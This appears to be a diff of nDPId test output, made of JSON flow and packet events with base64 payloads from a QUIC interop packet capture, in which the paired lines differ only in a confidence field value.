02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1603816434582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434582,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAoSJAAEARNaLAqAGAM55pYsqvAbsE7MzswgoKCgoIEaz1Ap+9VxAAAETSW+W4muYv+Ex5TDdhGEEgn\/uAu0qlojP\/J9hIDPqzwz+JlTXFPtSI+aiI+wxPcULAye6UrinGUUzBJN9cIkelzrXiONFE9BjSvgDnaRECpumembikZ2HAk2TZWGNiHThAH4BNmcORyySVZrHBrWfpgdT2X+HBd1V9EwlFlpGOWc1WMXNhMkNYXVupHdH7xVbTBo5OLCElubCjSPLQcYjGtGeLSII96GmgvBOPIrvVPJlrK82HF20a9nNNukdp4BPXnL8I2t+rb0dK\/ghu8TRSa3A+cCR\/8rWbZqaii1OpbuZnQ1EcUrceIDrLKjGsVgpT38KpctLTQ\/LEEVi9cgfwkd28yGJ\/sRbZDa9nN\/DCQk\/CQdVd36eB9jrAYsgu00NdXaK8a13Lde68fZxyZAQpIVnvcfH2Id0GXqqN8JhGEanp74gRCpI27i8iPAmsd3UMjsAW4\/kdVXe3S7CJE2WY0tiD\/+JDxJcFk5llcTgkntKqmYbhPxvEadncEKOIQWKyGQzjDvwSwmig63\/L5G76ukNd5cXQMQN9y+ZTvw7kwrdSXrlmPNlCnkDTwHvC5AJ3k2x4xqqQ\/iNrJ0ZPKJa+ZbSaagf+oOqskwf4MMNjZMwfufWkri43N+eDbtXKbCXPhtUVj407PdHTmzDQCEhc\/2YUIpKa27K6uS7hywCslRzTmpBr7JTDvB08\/wQc36h91hA\/Pk+QFTxQ3jSb17rPzZignHJ8+ktxWDlqgmNhirOBTFHrKKKxFfj7Zd\/VdS2hwqNZRHNiT\/rt9McdxnGuTtU3Je9EyeeJmZRmMe\/caGlDh5g04pl8F7+Oo1btWtTbgaTib8s1bb7OqyePGSaVywbgEE2DT8hSkw\/0V9rX3HxqWWKlm3Q6KLMIO4x9UT+hK9EjaTbVO3sb7ntSBtUvWM69geB7FjBtVEq\/e9xSbiiqRGEZN8fX\/2BZdK\/e7OiNqVv+75BROBKhr8CroCTuIcvBAJsteqOP53Z29BgiPdg5qdLysu2zuT3+eDoL1SSxZ3XRR5bynYqVXOHT9L+i9E\/4kNKasvWdlomwsUZBUHLlgPk6bGw4Ne65krgmZRjBxl36YGLw6+sfkjJoh7npwlPGVTMi0to4OLfQHhGF0beq1Uwve8Fq1vubD4YPVoyRUfwB7pZiGZlefHURnSMLZuwlS26beylIwMqP26dsDx7\/clmOwL44sg6\/0wzyXIpZINxypwBzbjs9d0tlnjJXwUYRy9QmD0slTxEyxrjpBtheiCMc4Cn\/6vmy83GYsYqAPaHjYm5Lm9bkw2mDchmuHIE33cyYUc9fwTe495DLrhWVEzAWbCKPviregmjAsH4m0iA+u4W5k31m1AmJpuBDrgjPUcXL4i82zhjeL+h12K6gteHYqwX7EOPhQ+bRm3SKhW2iyandNBDGKMy2kYZB+kl96lTKXHy42WcNsjGKMfUP9vZVhz0rZo8wSdI7knLcO6jiMKqrsnoCOre5s3EnkzOjTGJ
OpVTbDAlyOIrVY0\/12bwxq500zdJS7Tqi8Od4Mv0jxABBtbfjE3S4PoXY6OYUNPBVH\/C3Jt3XbMm8PyemuOM8gg2u\/LJT60w1swKGZ4faRilJPXx5ej4jCKtVtArI1E1I5haUgoGSnYETrYiEWQ=="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1603816434584,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434584,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAXS5AAEARruTAqAGAEr1U9anTEVEE7CkgygoKCgoI3rE9GgKLpyEAAETS2D6FRkK87MNUIcKb45nDQXK7RIhN5jovTQDmFSK2M6QiVZpJOUYoJlkltsOnfd\/1F6U4IQkpFe+m1uV4F6oBz4RBkNPAAuUUBMdDtca4r1A9a73h9DF0dBCYcXkZBvDtL9wCuog66vADNiZMmDEEKyoT8ED6s88IFRXJtbENfR6cs0sHtB4WxRNwLE2yoS5jEYyQtDPhxoDW6y1RUStChGv8HnP3XMM2t\/jLHE+oLZ20Uei8+UFfPk0e8A5VrXwIo9k4jCJsPG1mMTDbv0YDgoPfvTmJTVTIw4QonxYS\/rk7SadZEeONmPaR6TtoWts1FnzUvtWOpV+5Dad83KsfG90X\/CIt\/vwYmyVKvj4VgDM6Pr4H+Uc\/bvz0KjdGW3xm9YMUTlsbI5ol2Pfvu52tXEEWdRjKK8g6DND8ZlC7aMVgSCICn0NKoRloC6NcE8Rw5LJBhOhPXDDbCt20z0FHuqxH9Vx85YXc89Y9JZS\/xEo6rLepUNAZyK4VZC62QFOzsGL6Lx8wSrVduZKsiJBZ4c3ThpGGJ+vaMWABr4\/cWq95Q7ZzLSuvRsXOk+j1He6DsUvm3J+RmjmrwYFgt\/M4CICjBS0Fm10ECgKhrWwd3J2E54DK4DKQ3EUyd3bjdTDHFVk2++CCDGOxGq+7NMa3RFtYVeMobAS4ZjFwkv3BS0m0bobUjHhoVD1GCqa6cx2A4+lBUsOhUXvuodo95jKqOaTXUqsvEaXzN3L7b43PXMpLAq+LaQ7Vzd1FgcpeaZ20BnyGL81mPGhvhcnQeusPeZeeqS6zV1B7OHOYc65wKxzUbYn1EC28EGygmnjZWc0jy2pYGDmTX7nQGQSjnYxGUcUGQPhaCfOeI1ggQvzjjmgpCyBH7XX3wXAV\/IVyilSo0omRqkl\/bMhBxO
5UlcQB3HAXvh7\/CW9oHeT1wKQ3fB\/HEa9yU72ZB7d6KVeVKjZq17j4ybQ\/1ggtHYGp2pcGrXZzRwYjOkAZ0Opiy89watoyLGRmGLgTFsDl3McdaMNDx+9v81zsdMOm7BtAMYT6tRwsjrRofdkZ0fVa+YwJIBwtAhT8ajDn7UeBBPGRi94tJDcKF6j4s8my9KviboSu2mxdTOGQO7LtRIaKMRxlUFMtCi42onUa0qPaP+\/X0ttI9DVmM3lXTbZz7zAPwnKTDbrTvlsXFf+fb69MdPyK+0ZKLVzYuN6Rage1Taxjdnuj4OAM\/zUBa3m3soYXUIDBjkGYI3RorjKOgin\/VL4DsoJChrJPR888h8Xk\/IbBDawgJWzXLfoKqwSjYoA5BJLar1\/dem1\/5+HxdBDknyqV+PU2P2vYp8hNcb6mnUzN837UGUuA4NsueZUnc6zYaSL6DRRgrjjKhF6Tz\/MDuOVmRVnM76clbdBfnFUZ6P1n46WbYwkc\/I8+JIV6\/IqS+DjXGRm3N0QevTA6r\/68gEOcX6irDxw4FjiTMIU+OFUnGh6WsbCgi8K5SeV1kRKBmc\/TSum+LmX9s3PKC6cu25aK8beNwOxmv\/gY54CIgRosYlyDeYbWJdPZtKjt0TZLq4wV7HN+8OtqvsSQLBG9tsFDIGXLerkJmoKCBPMmTv62Jjm9BtEc0eZuVqDPUnoU+YqxHdkhj9bAhq0W1dwrlRBuS8N9Rw=="} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1603816434585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434585,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAgstAAEARnBLAqAGAhfLO9L\/\/EVEE7M7UxwoKCgoIFbSGVwPjC1AAAETSjkROzIIp8CK\/caOuFZYAfK1aOEqO4JwTw9D7z+uUbIBTx\/XH4yTcUJ1GJ5nL+Agpz8kkGqy7oh35jkjpRQSyzT2NyzB2NTBiZzOgYyNio+jROASCrTsvFc3Z7POk+A3z6nh\/zFa0LHBvwlp+McgWNFYpnLkD+S13ugMu2uizXqCPOTgA3G6sIsESNefWZzgDU6TE0Fie6rZUHLpsGk6\/rXINEPxgL\/9wq34N4qUhpvbCKjEq66pMlprpty+OzFobGyzV+ZfKcjfk9heS8\/Ktv46aaw96hlXnUfPZHMbA+CWsmthusRBP+K8uIWlnTbdNz9Rfn\/rIR1WmSXPxGkt7FVroGfbPWNtXVz4++NucTI\/gHddPWrZHVTxmD4eDZ+gEpCk9qXs4vIQRkuhhDT7KtsO5OQlx0LGSyxQmka20y1oOk5gC3euqSWQvmM8esR3UL4VI1v9ztMr8LjMn0OiMu95CEowBICOANwFprI0fObMHGsulwe5nvslar15BxrnmzEPNZiHa\/I2lrJGnez3fp4uBPMNgkQPccWwS7tSftVUqukoIkaMMDDugrSYQ99AP2nblRffqf3JA4AsmJuPW0X7qs\/Byp3V6ceyok7YXbgcjlYcvQaIYY\/lxFpek3Nn6KNssLG1fs0ok3z4gezAdPzCDxhvWVe5HYAr1IFeRj3nq\/RPsEA6C4W+4l7Yb2Q+t\/rGxDvAreWu6lw7r0fJV+s3RVQJy+tEW28PRfLsTsQmCiDcS3zHb84scMnkwv5bvftQiTHPxbXfuzIT64fpwltpQEBi3fJ3wBTXCGnFFnw7Nsf4\/JCCbl8lJDqInzgCs+\/Y\/bv7BFYE5WwvyQhhVAkY54ihB2e1U2DYdn7Zqiluxkz6gTqo9t0goC9XZwhqTLhcNfKD0XB23eFaY3KoEPWuPes1Ne6OhOBQfjbGBHAapLo8KpRyV6yba5+B3oKegQAyfeyrNROon4pshqrtlR67NkthaTNhbaMWzCPQYQ69NKAHv4GZAavtCgzoyw0xfFk74LvRxAfWd5OtjPWFSoU9lQ+1mdU\/bOKC6O4VAOilWKe6QbrEStrVui1p\/aQNyqAYvjHwGeocuQw5Apru2zL4CCg9jzkD4KS\/jN+UCk46yLdkn5Ubz2Y\/4Tqj5walihAnanr74XvviJcs00s6SbGZQRIQnGnA5QboJY2HvdZJa5px5WoWlaAtRNSjKOb8VqvcsOTB2gm51ybY2P8hwH3e8MTnT6NSTQUYxd9MKuGbtBlaY4If+PpqrBCmLTLCDHV17kk1VWuNwxmBudJ5goE4YQONWMQUK3S3Ul6LG6ZXlHy88HhO5x8L0R8jS+WOFGP6zSoYvhB8OXq99sB9qjRABZmtgMm6tlllhZ6+KyV6yl0udz2oNhS2Hk09RxStU8\/YuG1qMWFdf1q4PbwgPZ\/SEU8YEQ\/gK\/b3lzjqtkntdDToIJ29938u4+Oea0Z6Ovn9IPTGyjlhkBTrCdjCsinWeEj2
Cr6kqLjEOPd09mljIQf3aovLDbm2AUoZWafgLqoeW0JnEY2b\/2gwE5NpGc2iu38L1nWR8EcAN\/w88hux95l3UfaGjHKlj3FFO34BXqnrmch2I8X4qZ\/Xqx0WznIwTUj71m8E95Pb58bFksDsyDw=="} -01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1603816434586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434586,"pkt":"pJGxgjQ5PKn0qB\/sht1gDM4pBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrnAkRUQTYkaDFCgoKCghrDAA38OgwkgAARL4V7fWqJD97ugGiMo3hEbsI2+6\/SpwaiwHfJYhBwe8nlBeC2wTuSe5rZV7amDM9N\/ui5SRbMnMa4jgRbgv6T7FxocLh78\/\/47xNpYbQ5OnVlvNw6YvcG6V3D9lglGS7SGlN5I9EKjcJ6eJNC\/yHA+fna1KNRS6W4dCmPZfMeeRKhPbnKLP\/zD\/hQ9u8WpY9sQzK7DxdC06QgW5OFPLciatcrURwr8u743b7gflxyjWj2XMTb8+OZThPj0RJwH3mLn1aP+ys3uq61x1VUHQw18JbP+jOhfjr5+O\/DOmynEaj9yDtlT8pCQmkvZjKW+qGdVHgPAjMhELPJZM+CKVtQWm40oviKQmQrLioe2xR08VjBsCQ33vDOtlEGlAArjadOrMBFc2+XUcBiGRd32aXmUR89tCzI1B+GouNtIblHFiotduRGiNABGg+3Qc29eltQIl3PdSG\/mv6xeCbqRlmFNb1hZDT0EPrntyPIWcXzd7I6R9yH\/OcuERuArM+R4UUu7HVGq3VOIpyJl\/8vVA0PxAitJPE3y7Z8KBR5Uk9ypmv2LBTFbQqleqxK9NsAkl7SzAMl4vTV6UfLWkE4v+lvbSNEQ+7\/h05HZdmM+ow0IuI\/BgPpOsDV
tV1aa5VzDkkk9VWQdMUFySvpiE3OHVn9TUuuM9z5aYjx1qv5iZjNaxwGxQ2y+LC+sSOXYRfbtK34ZuCzCSfwzTrrGUTngeMOBfoZ0Xj\/ocEK17WUvslg9MAtjR1Gt3CBgVFOL0OMDBH4AMY+AhGxe0SgGsm9XvIgfhBa9vjDgpW2bJ0dEWPHP5qrAgfuKrrDizOESiLnlVMmMFXOgizTrGewuj0m\/x9ORClQAI0lFK+zVYRJsDUDjl8s8kMpL4rhzj3idhtdVWCdH8wFTr8WuyJ56hOdItfnc01ZNE8WReW4m6xZikAeggNMeWiKtQq+jfhT6qhFmDdif53uwIz3lMDO2crL14B2fVYDgPMUN05glordSj1PZRZS0OPJgjhG1Hs262PpADEzmqa1d8PWOn7489KV\/wKRhTXTO8HK3lkd68JU4rMEIXRiF4qH\/eZSGMgWSgdLEk9Ag7IV4F4aQpdDeOkRKGB\/bEnoIBfiBauwiLbdlgdD\/c47VmgQoRcvQk5GsUx0U0+wFCL\/ZkzcmI3DYCHTfNkG2aEAA+xvCWzWICgkMC5+W19MUzCoMuKizeg1ma9CdQgrL4sjg3iELKoYVCphaaL\/n3OYJYWvTTKTbT6OOq7SWtEDlUmidq13+s7Sl3Yj+afjtbetPkC\/8CAhhTxZQSPMQ1Ni1uSCgMYa8Y4VkddiZbjqAaSZzKfWrctUQrKqIadtSGNHtMQqjpEIWiMo8o\/UgBofbs5Kg3B8jC+JxO7Ld\/FGGhuabdGKUSF\/ZtUgLnPcGEW5kKFktT1D6fxQMfKzarearkPRdC9eF2UogCyGsrOxI\/GFB3vpOggGgWFiIo78PmOU0twqHHZC0t0srjfWKBrf\/fzPkN55ufN73EVurA0pU1TeEWhtid5II3hk9ekWAYMe+fHTtyW461m2tjhK9mczMG6wWszN2qKL3rLagh+IX9s8CJGYkrmfOhgpW1AdBPHq6OvvD7s1\/95DBb3hQ=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00643{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1603816434586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434586,"pkt":"pJGxgjQ5PKn0qB\/sht1gAlC2BNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWmsgBuwTYjDrICgoKCgjzgkejWnQFTwAARL7AEcGzrGiFbLDVVitPMjpX6T6us8klH0LZdsk33gK4kca790hWc9lEqiHw2zuG3cvmTx4edwCefhx9uVFQHbwCX7OdVaAKALQsTDf2esUnZnHqAVwqfHs0alGH87lg8LOQYMLCyJ5o4796Hi54oLNHvp1iBOlawAP1QQwkOrhTac81Z\/3lqw5txy4fqI2ulRUcc8HMVbAvriqgCRBafLPQysmCOVqjinACocPdi0ZP1pUx0qn0+kKcTF+7gFuANdSw5ZrXDF5v6YKUxiJ6vSw8Hy7vrpHpUiN+5fprlESKduOvuve2w8S0Rn1T\/QCLnqgsvW4zVX2obPqKMBoLM0FaRFm0tupv3jD2Bo6wMhEP7UVS6LQVCbX\/F5hZ42FQPL174ha0Yjp7fot\/ow92n0s8sDYpXdyVzzUtmI9H59mtClZBkXIm4hCy5YwKUBE5Htf0HL6v7tX\/C56I4bHgjD1kXDqKwEusnGxfxLkbm5cB84\/UPVfX54l5AlcUWrKt\/sWPHXza3lrXmjl3iKLayJGvSvxgwAyLdj+1dAf2mHjT3T9ZeLg4TPyNz17SLyKDROZpbuZtC2zCbnl+NoReuXxIIu553FeA7K1Fq06E+HYHhMw9+fWseAQfiQhoIBqlHGL+6zzFwJx8LqsX2kF9IlqJJkfGxh2dCK8J4o5uVhtnU3J2xj0GDXLtBrNSCk7DDd67hChkNkJ\/zra77RGExcKdo9KUDUUYykOLFAbdNAsP9djZJfE2+FIW26Q0ve6PvxjGma3cI1DAbfodw3x7gmpMenGXbAesto3GigfY8Dqk5DyVN2us4Q8jxijjrwa1uGb6WCWFIbPGsRxa2EtoUIAHsP\/pagnvZR1tK2myhxOFZczPeNlpxk1o3SOIXdZrMfCNqe8UgV89dZHklMi3hgQCyoO5n2p9n2UNtckDsulzdkWAkN7ELjfKSw3xLKX8QYYwRNZkrnslYV\/gNUyPn\/DAHxcrYsCggnVPpcMfjQHnjiySyU7agWUfxfnrK5KR0Hz1uxcerQD9r2dHrU5GwRgAJqiERgTrm61j0\/9g6EnJzaJxnY2YL\/8StPHOT4TbswEzgPxmOMhq3B3NyVJmRRvGKyoWosF33+eeRJZtqDmGzt7Y\/QslvmPGsoNyGhIfWD4qHCWm8JN2zWi8NKuiyFpgsC\/gseqp2COjYeHLzTsHE8Lb24ziOBbxiS8nhlUeyvkTXTnPgtpZev\/ducm+wW0A+YY2gp+9vovT+lMYKPoIIeW89qmvsTK34QrhAHBV8Gdi7IG6oE67NdkIrFleG4EtBQyuNTVG\/Hni6IlsFEhmcMOi9gtqRQF0bots7U2r2su6TX5cs\/tWsUtfcKDq01p1Oi+UeZRz\/V+lKX5GfCRE\/JIN8wqGMoYFzwTiwgXQFJuV\/tc8U4uoRYgnau5MAB9+BYOU44CnqwsIla5AaVfMisOMnVZhANbfOkDwWOMu